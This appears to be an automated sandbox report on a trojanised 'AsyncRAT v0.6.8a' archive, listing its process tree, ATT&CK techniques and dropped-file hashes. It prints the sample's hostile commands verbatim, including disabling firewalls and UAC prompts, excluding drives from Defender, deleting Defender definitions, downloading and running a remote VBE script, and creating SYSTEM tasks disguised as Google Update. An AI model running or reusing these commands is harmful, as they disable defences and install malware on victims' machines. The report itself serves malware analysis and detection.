"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1664 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1108

C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe"
1⤵
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\SysWOW64\WScript.exe" "C:\Windows\system32\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe" /elevate
3⤵
- Modifies Windows Defender notification settings
- Windows security modification
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
4⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 0
4⤵
- UAC bypass
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA â€‹â€‹-Value 1
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0
4⤵
- UAC bypass
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1596

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
5⤵
- Deletes Windows Defender Definitions
PID:2320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Install-WindowsFeature NET-Framework-Core; DISM /Online /Enable-Feature /FeatureName:"NetFx3"; DISM /Online /Enable-Feature /FeatureName:NetFx3 /All; Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3";
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980

C:\Windows\SysWOW64\Dism.exe
"C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
5⤵
- Drops file in Windows directory
PID:2400

C:\Windows\SysWOW64\Dism.exe
"C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3 /All
5⤵
- Drops file in Windows directory
PID:2804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/BejaminGofer81/p/raw/main/post.vbe -OutFile C:\ProgramData\post.vbe; start C:\ProgramData\post.vbe;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\Microsoft\Google\src.bat" "
4⤵
PID:2624

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003Core" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC DAILY /ST 20:30 /F /RL HIGHEST
5⤵
- Creates scheduled task(s)
PID:1680

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003UA" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC ONSTART /F /RL HIGHEST
5⤵
- Creates scheduled task(s)
PID:2304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
4⤵
PID:1876

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
5⤵
- Modifies Windows Firewall
PID:2684

C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1468

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2520

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\SysWOW64\WScript.exe" "C:\Windows\system32\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe" /elevate
3⤵
- Modifies Windows Defender notification settings
- Windows security modification
PID:2628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
4⤵
- UAC bypass
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 0
4⤵
- UAC bypass
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA â€‹â€‹-Value 1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0
4⤵
- UAC bypass
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
5⤵
- Deletes Windows Defender Definitions
PID:928

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Install-WindowsFeature NET-Framework-Core; DISM /Online /Enable-Feature /FeatureName:"NetFx3"; DISM /Online /Enable-Feature /FeatureName:NetFx3 /All; Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3";
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\SysWOW64\Dism.exe
"C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
5⤵
- Drops file in Windows directory
PID:2416

C:\Windows\SysWOW64\Dism.exe
"C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3 /All
5⤵
- Drops file in Windows directory
PID:2204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/BejaminGofer81/p/raw/main/post.vbe -OutFile C:\ProgramData\post.vbe; start C:\ProgramData\post.vbe;
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\Microsoft\Google\src.bat" "
4⤵
PID:1208

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003Core" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC DAILY /ST 20:30 /F /RL HIGHEST
5⤵
- Creates scheduled task(s)
PID:2900

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003UA" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC ONSTART /F /RL HIGHEST
5⤵
- Creates scheduled task(s)
PID:2928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
4⤵
PID:308

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
5⤵
- Modifies Windows Firewall
PID:1568

C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_AsyncRAT.v0.6.8a.zip\AsyncRAT v0.6.8a.exe"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:304

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleCrashHandler.exe
Filesize
285KB

MD5
e8de6e81b27b60a15b07d63b51f88d2b

SHA1
4b786b4b341ae5854a79f3c05e40fe3e224d056d

SHA256
e66c102ceee633205286f122458a1bade0738a35cdfd7988ec442886aa5c5007

SHA512
3cf1c625031be850df00ed5db02a54a4d647a6cdaedc325fa876e4efdfce0d552fe1cd60341ea5a16664be23a13d98dd151c17f5eec04503329ea305b65976ef

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleCrashHandler64.exe
Filesize
364KB

MD5
33f147b0c09c965f5a4e7eeeff2d9659

SHA1
c71f0450c603a3fc027c2260b2f6e6090684a169

SHA256
14fd1df8f4bd086f603e2de7552a79bd80afba0708b36e5791461fd195d7ed8c

SHA512
8355ea067ab8c71b290b0fbdbebc95d3e94356a7b9076e0bd4ca54f2c5d5b9e49bbf8b2f68889b5f5fcdb64231cafa9d35d2b8e2f746b0fce65092fb6d19b86b

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdate.exe
Filesize
150KB

MD5
59ea38acbca05610bfee326da3f2d96b

SHA1
5bbc85ca56e0871f56360cc9c3fad1d63e9b23a5

SHA256
cb7f48f36c649bdb12fd09d8fcb60d99efbff44729515fa3cc77f4cdb18d99b7

SHA512
b1fe1d99ddb8f2c53a1cb3756b0f3dcba5c449721b9aa3ecba44c4316516b60c81163f3198ff869ef68ff8980bc7de7d8142988a05f6c9e9f574b942b622d321

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateBroker.exe
Filesize
97KB

MD5
bd2e5162958c2cfa6cfa16d68ec20bcf

SHA1
15226fe919bab55c03b7c51012e432b5b164e2af

SHA256
1686a0bc9c13c1c57d769920dbb6da02e240cdcea6078822387f986a49fbca17

SHA512
2347bc6f72609f5b29999344001d02627ba4c0089d0f386520fcafced995a7b91090386dd4a868280a72978ae8447a25c4e2bb2773638cb72683bf0be8261fad

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateComRegisterShell64.exe
Filesize
177KB

MD5
7e6579e6a59157b3a8672d6c43750093

SHA1
50fd4925e975d4a672d6d79fa4523149ad893d6d

SHA256
788f7e65e69484eee27d5a34311357aead31e905fe0f85f165a77d53a12f53ab

SHA512
0fe13270cb3bf8e90f6b92423a3da9410e811048a62d7193ebfb873225180e29b9feb128a1d2b2b1d8a4e906bfa48e5009cc5b8c20e087743fb68e9eb6920deb

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateCore.exe
Filesize
211KB

MD5
a801ffd44995fc011fe9adf267eb76ca

SHA1
93002d350f2d68ac2cea3f568080e12ca116e2ba

SHA256
fbddbf7c0f394e9600bc15b38f9829cafd45f252397d5ebd5ad7d07c575be344

SHA512
4a17a33a69ccdab6f06437bd5f98de2eaa2dd3873579c4a8d948735b3f1156dfbd62ed6d23be0d54b208208605bce28f490380c5a716e64a846973cceaa9ca01

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateOnDemand.exe
Filesize
97KB

MD5
144968379c4265e662d5a4ee6dd261e6

SHA1
7ec5630f62ecf6055f9e02a4b5323fd1a0a83b6a

SHA256
fa56ba25861f1b5040afd04bfbfd36353004cd6b2c457971fb01db26ff002f35

SHA512
23976bae55790d8ce669167930f6371f8bf8717b60e99ddab6ced095b4e5bd1251ec28101b3191e9ea64d71e964545f829434b2aabc2f4ecea028631b29f1b22

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\GoogleUpdateSetup.exe
Filesize
70.8MB

MD5
245b3ab82a59d89a25640fc7596f0106

SHA1
12092d3cae25d96a8bd2eb3fd69be7bd8a8138ff

SHA256
78cbb9d15e91123e19f7e215295da09919a09cb10780d8fdbb4db96e2afd5fd4

SHA512
8c4604db86a59dd221a6e082aa2f55c53bfbb9f83909e34fb27809959426697d9621027aef4e1808592ee2e7813d7f7c015798502d2ae22ca29ec9f5a6091814

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\goopdate.dll
Filesize
1.8MB

MD5
58fb6c1a459fe2791f4a416b22ec2cbc

SHA1
96c127426e02fd73cc9d4f15f878f1f0ee7c4946

SHA256
9770385352f7f578e711e8c8494e7817878d66329b28478942d12742101df52d

SHA512
a5b5ddab0580df716c4cff5c5e822b131b849dd61173f4aaf69be7c97a17c21f04e77ef57313ff4baf2b1092aa052a36bc329adca58c76d0d3d9adafb708c22a

Download Submit
C:\ProgramData\Microsoft\Google\Update\1.3.36.71\goopdateres_am.dll
Filesize
45KB

MD5
4f5286a1f8e2af6c20daabe4a099e7f5

SHA1
4475de7540189c60ed2c4d443fcce208e00998a9

SHA256
df449f819bd94384fc3534bdaceb2a7e5d627113fe4d974d698c7b46069c7e7e

SHA512
db7a8c59d83a5db75fd0f293c2349bb71053ac954800c4bd7e6ab76361646b383e94b252a6cbc759e62693d370c6c0e20fa992908ee0c7912063d4e9491a0f7d

Download Submit
C:\ProgramData\Microsoft\Google\src.bat
Filesize
775B

MD5
1a7f60c6657bb003216db72b4f550a26

SHA1
0fed1e332b2570a3ceed6d3d7482f31a91d95f0e

SHA256
9798ff8cd05e753d3dd68f78a2541ab6d5f62a6a2442e7c40218cfb4313fcd06

SHA512
2e1b529820262919784394861ac4df552a083336920432e3c5fff5b0b08cce1a105532c58cc4a392649e2482772bcf57cd0c6ceb69b7137293934ca7ae9e3a12

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
970bdbd3707901a25b7ddbb94b6cdcc9

SHA1
a91bc2b4ab5b4660cafbff9662e9d4f6d72b356b

SHA256
d3db0b03d82f3bd6684d07ab999f9013591f41637e0e740e97868e71fb462426

SHA512
25887a977db4d441546242da7764b9b302fddde0fa2c818a5497119b941d5d7833c341943cb1ba85df82423b3c541904a7456c6e394f707a08a9ba423cf6eb8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EF53UGF7\AsyncRAT.v0.6.8a.zip.cpwq88u.partial
Filesize
5.9MB

MD5
f1fc72fd4b23600689c32af5c6829fe4

SHA1
32f19d7c9a74db31c4303aa8de881908e2d3db6c

SHA256
fdcebac48b9ecd0c49b077a4101597fd1e5c40786ceef4ab3dcf1f4a43fd5d47

SHA512
e4a8f5446ddfeb6535ed8de0bda5ae1d4f9549b30acef50496b5457c24d260595b02a82d772af387a70329ba43f73cfe5598d60846cb8c1b332b7e7227b176d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MpCmdRun.log
Filesize
1KB

MD5
01fd4c175af735582305b382d1f56799

SHA1
530d79b31760a720f7b8ecf31fd85a814eb956d4

SHA256
222e89d1ee1117612062effd5112ec70c02d21e984e4380c344d5555e26cae9e

SHA512
1e9ce1ed7f70bf06eee6bdf25571195b528b76df69394837498bfc2d293f6a3fb6ac49ddf1daa9a4f83c945e50b90867197a12185b74b767d5b737dcfd5c4b9c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BBCRR811.txt
Filesize
601B

MD5
ae6858856a994f2f0bfd6154e16b5e9f

SHA1
4887eb9e16595ddd717c9adb8ddc4cbb994ac9de

SHA256
919e5800b9234998406271af5cae87af8b3a8e8b6da4c3c010c36b6d4c8a4bfb

SHA512
19f5e5983a9a7f461830bda579a728c3673062c3b4ce9c24b7f97626e95fee6a437c6ff20da453c0d91eea7b8ffb79ad0165e4f94359243ddbbcdbc4aa6c3410

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
2b180f01e18ed8c10ec16e739576dde8

SHA1
cea5ec1d631001929d59231ee557eb643114e6b4

SHA256
458c8fe25d738855756502c1c446db573998cfb19edf376f86e450095f552933

SHA512
b33cf9b34eeb98db0165d1f5b8e919770086556901b15e8357ca7bb74341d1bfbed3e872ee0664c4d3568a4ddce1577d5b947ba13098a4a0296ea3196974cfcb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7ba3081375019612b3cf3f834f08650b

SHA1
9b7fe8c8ed5d0eedccde8bfe75eb8e75132a1336

SHA256
b280f7419de69358719f2205a54a0c4df304878ba9b44b2a1813ff7d983cbedd

SHA512
97559c0ae36acad6015c72d6e7fe0f3a6168fc606a901cd81f8fcd2acec2ed768b832eadace058e3ab0bbf29215b7127b5f28987ed8e0d708cf9d0de59a3795b

Download Submit
